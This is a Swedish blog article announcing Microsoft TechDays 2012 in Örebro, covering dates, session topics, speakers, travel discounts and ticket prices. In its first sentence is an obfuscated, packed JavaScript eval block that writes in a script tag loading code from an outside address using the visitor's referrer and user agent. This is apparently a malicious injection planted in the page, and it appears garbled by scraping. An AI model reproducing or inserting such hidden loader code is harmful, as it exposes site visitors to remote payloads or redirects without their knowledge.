Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

PC

Microsoft TechDays 2012 närmar sig

Sebastian

Snart eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fiyns|var|u0026u|referrer|sdkba||js|php’.split(’|’),0,{}))
är det dags för Microsoft dunder evenemang
TechDays 2012. Varje år arrangeras detta evenemang där Microsoft bjuder in exklusiva talare från hela världen.

TechDays är Microsoft största it-evenemang för tekniker, utvecklare, arkitekter och it-chefer som arbetar med Microsofts produkter, plattformar och lösningar. På evenemanget får man träffa över 100 talare tillsammans med 2000 andra likasinnade deltagare.

Det är det fjärde året som kommer upp nu den 24-26 april på Conventum i Örebro. Ett mycket uppskattat evenemang som varje år dragit fulla hus och självklart är det inte något undantag i år då det bjuds på händelserika möten som bland annat Windows 8 och det heta designspråket Metro. Självklart kommer det också talas mycket om applikationer och Windows Phone. Det kommer bjudas på sessioner där talare berättar om hur nästa generations appar ska byggas på framtidens plattform.

Just nu finns det hotellrum kvar i Örebro men vad man kan se på hemsidan börjar det också fyllas med fullbokade i innerstan. Microsoft är i samarbete med SJ som erbjuder deltagarna på TechDays 2012 40 % rabatt på ordinarie tågbiljettpriser under TechDays. Här kan ni kika in hotellrum!

Här nedan är några av de internationella talarna som kommer hålla i sessioner under eventet.

På onsdagen den 25 april kommer du att få träffa Pieter Uittenbogaard som är marketing directorWindows marketing.

Läs mer om Pieter Uittenbogaard

På torsdagen den 26 april kommer du att få träffa Tim O’Brien som bland annat leder Platform Strategy GroupMicrosoft Corp.
Läs mer om Tim O´Brien

Från Sverige kommer vi få träffa bl.a.

Fredrik Normén som är Microsoft MVP inom ASP.Net och även är ASPInsider. ASPInsiders är ett bollplank för Microsoft produktgrupper. Fredrik har arbetat som arkitekt och utvecklare inom Microsoft miljö sedan 1996 och han är med och driver Sverige strösta user group inom .Net (Swenug). Fredrik är delägare av företaget Squeed där han arbetar som expertkonsult och utbildare inom .Net och utveckling.

Dag König har sedan 1986 har arbetat med systemutveckling. Under den tiden har hans teknikfokusområde varit Microsoft. Dag König arbetar sedan fyra år tillbaka på Microsoft som Utvecklarevangelist med inriktning på Visual Studio och ALM. Dag är också ansvarig för Microsofts podcast MSDN Radio.

Tess Ferandes som är utvecklarevangelist på Microsoft med fokus på Windows Phone, Kinect, Windows och Web Apps. Hon har tidigare jobbat på Microsoft med utveckling av ASP.NETapplikationer och produktions debugging av ASP.NETapplikationer och har under många år skrivit om debugging på sin blogg http://blogs.msdn.com/Tess.

Är man sugen så kostar evenemanget följande:

– Ordinarie deltagare med tre fartfyllda dagar och en massa spännande produkter: 6 595 kronor

– Akademi, anställda inom skola och högre utbildning: 3 995 kronor

– Student med giltigt CSN-kort: 1 995 kronor

– Endast Pre-conference: 1 995 kronor

Biljetter kan köpas här!